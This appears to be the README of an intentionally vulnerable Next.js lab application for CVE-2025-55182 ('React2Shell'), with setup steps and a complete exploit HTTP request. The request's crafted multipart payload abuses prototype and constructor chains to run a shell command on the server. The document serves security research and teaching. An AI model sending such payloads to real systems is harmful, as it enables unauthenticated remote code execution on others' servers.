
Proof-of-concept Next.js application demonstrating CVE-2025-55182 (React2Shell), a critical RCE in React Server Components, with exploit example and mitigation guidance for security research.
This is a proof-of-concept Next.js application vulnerable to CVE-2025-55182 (also known as "React2Shell"), a critical Remote Code Execution (RCE) vulnerability in React Server Components.
This application is intentionally vulnerable and should ONLY be used for:
DO NOT:
CVE-2025-55182 affects:
The vulnerability stems from unsafe deserialization in React Server Components payload handling, allowing unauthenticated attackers to execute arbitrary code on the server via specially crafted HTTP requests.
Install dependencies:
npm install
Run the development server:
npm run dev
Access the application: Open http://localhost:3000 in your browser.
Build the Docker image:
docker build -t nextjs-cve-2025-55182 .
Run the container:
docker run --rm -p 3000:3000 nextjs-cve-2025-55182
Access the application: Open http://localhost:3000 in your browser.
/): A simple login form using React Server Components/dashboard): A protected page accessible after loginThis application uses:
The vulnerability exists in the RSC payload deserialization mechanism, which can be exploited by sending malicious multipart HTTP requests directly to page routes (e.g., http://localhost:3000 or http://localhost:3000/dashboard). The exploit works on any page using React Server Components.
The vulnerability can be exploited by sending specially crafted HTTP requests directly to page routes (e.g., http://localhost:3000 or http://localhost:3000/dashboard). The exploit works on any page using React Server Components.
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\":\"$B1337\"}",
"_response": {
"_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
"_chunks": "$Q2",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
The exploit targets page routes directly - works on localhost:3000 (homepage) or localhost:3000/dashboard (dashboard page).
To fix this vulnerability:
This proof-of-concept is provided for educational and security research purposes only.